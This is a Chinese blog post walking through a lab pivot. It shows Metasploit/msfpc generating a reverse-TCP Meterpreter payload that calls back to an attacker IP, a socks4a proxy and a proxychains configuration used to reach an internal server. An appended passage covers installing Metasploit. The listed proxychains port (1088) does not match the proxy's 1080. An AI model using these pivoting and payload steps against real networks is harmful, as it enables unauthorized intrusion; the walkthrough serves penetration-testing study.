双网卡 sql server 服务器_msf+proxychains代理内部服务器所有流量

proxychains代理内部服务器所有流量

0x01 TD;LR

在渗透测试的过程中,通过msf拿到了立足点之后,可开始对内网的其他机器进行测试,但内网机器无法连接互联网,可通过设置socks4a代理将内部的流量代理出来,让外部机器可以直接访问内部的机器。

  • 工具

  • proxychains

  • msfpc

0x02 实验环境

aaf7993c412b4abd6919fdf8ac7aef2d.png

注意: FILESERVER为内部服务器,WEBSERVER为外部服务器,双网卡,可上网。

kali linux:攻击机,ip:192.168.1.129。

连通性测试。

a4b1adacc4a0fd326434591a998ca6f0.png

windows 2012 跳板机

双网卡

ip1:192.168.1.133

ip2:10.10.10.146

56703fab532e3d33bfb438e7e854bdbe.png

windows 2008 - webserver

内网服务器

ip:10.10.10.138

0b2de8a4388f54952d155ff6e28e054a.png

0x03 具体操作

1、通过msfpc生成payload,msfpc会生成两个文件,windows-meterpreter-staged-reverse-tcp-7777-exe和windows-meterpreter-staged-reverse-tcp-7777-exe.rc,一个是payload,一个是配置文件,并利用python建立临时服务器。

msfpc msf windows 192.168.1.129 7777

99803a7f3bb53fe1a5ce139bdaa99a8d.png

2、访问python建立的服务器,下载exe文件,执行。

f27782d5b2c0d70824faea2d4fd6fb2a.png

3、启动msfcosole

msfconsole -r windows-meterpreter-staged-reverse-tcp-7777-exe.rc

4、执行exe获取,meterpreter。

e1bb2c6bbcea769174517e6795ee7922.png

5、添加路由。

16b78181aaba87038358a4c4d1b4696f.png

6、设置socks4a服务器。

msf5 exploit(multi/handler) > use auxiliary/server/socks4amsf5 auxiliary(server/socks4a) > show optionsModule options (auxiliary/server/socks4a):   Name     Current Setting  Required  Description   ----     ---------------  --------  -----------   SRVHOST  0.0.0.0          yes       The address to listen on   SRVPORT  1080             yes       The port to listen on.Auxiliary action:   Name   Description   ----   -----------   Proxy  msf5 auxiliary(server/socks4a) > set SRVPORT 1080SRVPORT => 1080msf5 auxiliary(server/socks4a) > run[*] Auxiliary module running as background job 1.msf5 auxiliary(server/socks4a) > [*] Starting the socks4a proxy server

7、配置proxychains

kali@kali:~/Desktop$ tail /etc/proxychains.conf ##       proxy types: http, socks4, socks5#        ( auth types supported: "basic"-http  "user/pass"-socks )#[ProxyList]# add proxy here ...# meanwile# defaults set to "tor"# socks4        127.0.0.1 9050socks4  127.0.0.1 1088

8、访问内部服务器应用。

a8c914ffae75a20d1d83081ea96e5188.png

9、设置socks host为127.0.0.1,port为1080,关闭http proxy代理。

fb25c93190e14028d2faf474c7c1878c.png

10、浏览器访问。6932ad465c744bf6c0f4e87210d33c32.png

42d6c8b7a3690ab9386860075ba91c3e.png

在云服务器上安装Metasploit Framework (MSF)可以通过使用MSF提供的一键安装脚本来完成。这种方法比离线安装更为方便,因为云服务器已经具备了搭建虚拟机环境的条件。首先,您需要使用以下命令下载并运行MSF安装脚本: ``` wget https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb chmod 755 msfupdate.erb ./msfupdate.erb ``` 这将自动下载并安装Metasploit Framework到您的云服务器上。安装完成后,您可以使用以下命令启动MSF: ``` msfconsole ``` 请注意,安装过程中可能需要一些时间,具体取决于您的云服务器的性能和网络速度。此外,如果您在云服务器上使用的是不同的用户,请确保以root或具有管理员权限的用户身份运行上述命令。这样,您就可以在云服务器上成功安装并使用MSF工具了。\[1\] #### 引用[.reference_title] - *1* *3* [云服务器在CentOS7中安装msf工具](https://blog.csdn.net/weixin_44268918/article/details/129771330)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [阿里云服务器安装MSF](https://blog.csdn.net/qq_43590351/article/details/126627769)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值